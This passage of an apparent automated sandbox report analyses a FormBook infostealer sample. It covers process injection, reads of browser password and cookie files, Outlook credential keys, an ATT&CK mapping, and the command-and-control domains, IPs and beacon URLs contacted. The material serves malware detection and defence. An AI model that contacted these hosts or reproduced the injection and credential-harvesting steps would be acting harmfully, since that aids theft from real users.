                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread register set: target process: 8012Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread APC queued: target process: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: QmkRHPDwxbW.exe, 00000005.00000000.1423113339.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754281757.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000000.1570468853.0000000001A50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: QmkRHPDwxbW.exe, 00000005.00000000.1423113339.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754281757.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000000.1570468853.0000000001A50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: QmkRHPDwxbW.exe, 00000005.00000000.1423113339.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754281757.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000000.1570468853.0000000001A50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: QmkRHPDwxbW.exe, 00000005.00000000.1423113339.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754281757.00000000012F0000.00000002.00000001.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000000.1570468853.0000000001A50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502647624.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502647624.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561747 Sample: file.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 31 www.izmirescortg.xyz 2->31 33 www.windsky.click 2->33 35 16 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 4 other signatures 2->53 10 file.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 file.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 QmkRHPDwxbW.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 regini.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 QmkRHPDwxbW.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 bpgroup.site 74.48.143.82, 49786, 80 TELUS-3CA Canada 23->37 39 www.christinascuties.net 74.208.236.156, 50018, 50019, 50020 ONEANDONE-ASBrauerstrasse48DE United States 23->39 41 11 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe68%ReversingLabsByteCode-MSIL.Trojan.Remcos
                file.exe38%VirustotalBrowse
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                tempatmudisini06.click3%VirustotalBrowse
                snehasfashion.shop0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.whisperart.net/rfcw/0%Avira URL Cloudsafe
                http://www.tempatmudisini06.click/4iun/0%Avira URL Cloudsafe
                http://www.christinascuties.net/uvge/?H8=BpFD-28hKhrD&GX6Lp2F=ZNVrNdoQnhuwr8rXgpUIPH4b9LjaUdnqJW8zgtLXFLLe8onm6IbnH5k6/OJNpvCzw5jcHu1YLU/U3UlnXJzWKm/g482Cdi9CT/rc1yKmW5XeMaWPeg==0%Avira URL Cloudsafe
                http://www.izmirescortg.xyz0%Avira URL Cloudsafe
                http://www.bookingservice.center/47f1/?GX6Lp2F=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT8FZPnmItglef8oIfH3xEPH5Gk5cdjw==&H8=BpFD-28hKhrD0%Avira URL Cloudsafe
                http://www.snehasfashion.shop/2lci/0%Avira URL Cloudsafe
                http://www.christinascuties.net/uvge/0%Avira URL Cloudsafe
                http://www.bpgroup.site/p8wp/?GX6Lp2F=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrnjhE6i9YZvkkiI4bTXFL7F6jfGLzFg==&H8=BpFD-28hKhrD0%Avira URL Cloudsafe
                http://www.hm35s.top/lazq/?GX6Lp2F=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkVSnofUD39ICOc0FIB5gcPzcC3Y1kKg==&H8=BpFD-28hKhrD0%Avira URL Cloudsafe
                http://www.izmirescortg.xyz/cxxv/0%Avira URL Cloudsafe
                http://www.717hy.net/bokt/?GX6Lp2F=poyWHxU0sXOGQX6eVUDBw1lp5X+IA5CiyB6gAIqfCj73s4Aj6MIiBsrDm9nDs7uyJKeVN/2spsRHx0Xh4EIWPHPhLhUxqk/k6TQj/zpRoAwTN6gmaA==&H8=BpFD-28hKhrD0%Avira URL Cloudsafe
                http://www.sitioseguro.blog/s7xt/0%Avira URL Cloudsafe
                http://www.windsky.click/gybb/?H8=BpFD-28hKhrD&GX6Lp2F=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO4PgAZipsqs/kn6LZvixDWxXnWnZkIg==0%Avira URL Cloudsafe
                http://www.moviebuff.info/4r26/?H8=BpFD-28hKhrD&GX6Lp2F=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80eqplMgmGVUTbCPRmhwbXi4X3f8N+iA==0%Avira URL Cloudsafe
                http://www.snehasfashion.shop/2lci/?GX6Lp2F=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDNFSbRcaQ2LBAWGtnFx6vVohs8RPjrA==&H8=BpFD-28hKhrD0%Avira URL Cloudsafe
                http://www.hm35s.top/lazq/0%Avira URL Cloudsafe
                http://www.izmirescortg.xyz/cxxv/?H8=BpFD-28hKhrD&GX6Lp2F=fEi8rzaYrE/XGRR50VEK8uqDXr7AK/1Kw/XUmUqnafTsdiSkrhbsiNoZNrJqJtIqpPiDC/W6aTtfGFbS6ow8ixkLbruB9JsRPd8yCP6sEcEmGu+VbQ==0%Avira URL Cloudsafe
                http://www.moviebuff.info/4r26/0%Avira URL Cloudsafe
                http://www.windsky.click/gybb/0%Avira URL Cloudsafe
                http://www.cssa.auction/rjvg/?GX6Lp2F=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MhCYnHJ28VWxL0fj0Y8TMYCyxad2qg==&H8=BpFD-28hKhrD0%Avira URL Cloudsafe
                http://www.717hy.net/bokt/0%Avira URL Cloudsafe
                http://www.tempatmudisini06.click/4iun/?GX6Lp2F=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywpudeeEuZLaZHAlqHDud2TkhyZZeYQxg==&H8=BpFD-28hKhrD0%Avira URL Cloudsafe
                http://www.cssa.auction/rjvg/0%Avira URL Cloudsafe
                http://www.bookingservice.center/47f1/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.christinascuties.net
                		74.208.236.156
                		truetrue
                  		unknown
                  bpgroup.site
                  		74.48.143.82
                  		truetrue
                    		unknown
                    tempatmudisini06.click
                    		103.21.221.4
                    		truetrueunknown
                    snehasfashion.shop
                    		88.198.8.150
                    		truetrueunknown
                    cssa.auction
                    		107.167.84.42
                    		truetrue
                      		unknown
                      hm35s.top
                      		154.23.184.95
                      		truetrue
                        		unknown
                        www.whisperart.net
                        		199.59.243.227
                        		truetrue
                          		unknown
                          www.windsky.click
                          		46.253.5.221
                          		truetrue
                            		unknown
                            www.izmirescortg.xyz
                            		172.67.186.192
                            		truetrue
                              		unknown
                              www.moviebuff.info
                              		209.74.77.109
                              		truetrue
                                		unknown
                                www.sitioseguro.blog
                                		172.67.162.39
                                		truetrue
                                  		unknown
                                  www.bookingservice.center
                                  		98.124.224.17
                                  		truetrue
                                    		unknown
                                    www.717hy.net
                                    		68.66.226.92
                                    		truetrue
                                      		unknown
                                      www.snehasfashion.shop
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.cssa.auction
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.bpgroup.site
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.tempatmudisini06.click
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.hm35s.top
                                              		unknown
                                              		unknownfalse
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.whisperart.net/rfcw/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.snehasfashion.shop/2lci/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.bookingservice.center/47f1/?GX6Lp2F=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT8FZPnmItglef8oIfH3xEPH5Gk5cdjw==&H8=BpFD-28hKhrDtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.christinascuties.net/uvge/?H8=BpFD-28hKhrD&GX6Lp2F=ZNVrNdoQnhuwr8rXgpUIPH4b9LjaUdnqJW8zgtLXFLLe8onm6IbnH5k6/OJNpvCzw5jcHu1YLU/U3UlnXJzWKm/g482Cdi9CT/rc1yKmW5XeMaWPeg==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.tempatmudisini06.click/4iun/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.christinascuties.net/uvge/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.izmirescortg.xyz/cxxv/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.hm35s.top/lazq/?GX6Lp2F=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkVSnofUD39ICOc0FIB5gcPzcC3Y1kKg==&H8=BpFD-28hKhrDtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.bpgroup.site/p8wp/?GX6Lp2F=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrnjhE6i9YZvkkiI4bTXFL7F6jfGLzFg==&H8=BpFD-28hKhrDtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.sitioseguro.blog/s7xt/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.snehasfashion.shop/2lci/?GX6Lp2F=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDNFSbRcaQ2LBAWGtnFx6vVohs8RPjrA==&H8=BpFD-28hKhrDtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.izmirescortg.xyz/cxxv/?H8=BpFD-28hKhrD&GX6Lp2F=fEi8rzaYrE/XGRR50VEK8uqDXr7AK/1Kw/XUmUqnafTsdiSkrhbsiNoZNrJqJtIqpPiDC/W6aTtfGFbS6ow8ixkLbruB9JsRPd8yCP6sEcEmGu+VbQ==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.windsky.click/gybb/?H8=BpFD-28hKhrD&GX6Lp2F=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO4PgAZipsqs/kn6LZvixDWxXnWnZkIg==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.moviebuff.info/4r26/?H8=BpFD-28hKhrD&GX6Lp2F=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80eqplMgmGVUTbCPRmhwbXi4X3f8N+iA==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.717hy.net/bokt/?GX6Lp2F=poyWHxU0sXOGQX6eVUDBw1lp5X+IA5CiyB6gAIqfCj73s4Aj6MIiBsrDm9nDs7uyJKeVN/2spsRHx0Xh4EIWPHPhLhUxqk/k6TQj/zpRoAwTN6gmaA==&H8=BpFD-28hKhrDtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.moviebuff.info/4r26/true
                                                • Avira URL Cloud: safe
